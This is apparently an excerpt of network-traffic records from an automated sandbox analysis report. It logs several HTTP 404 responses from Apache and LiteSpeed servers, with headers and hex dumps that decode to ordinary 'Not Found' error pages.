    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:35:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:35:08 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:35:11 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 14:35:14 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 13 Nov 2024 14:35:20 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 13 Nov 2024 14:35:23 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 13 Nov 2024 14:35:25 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 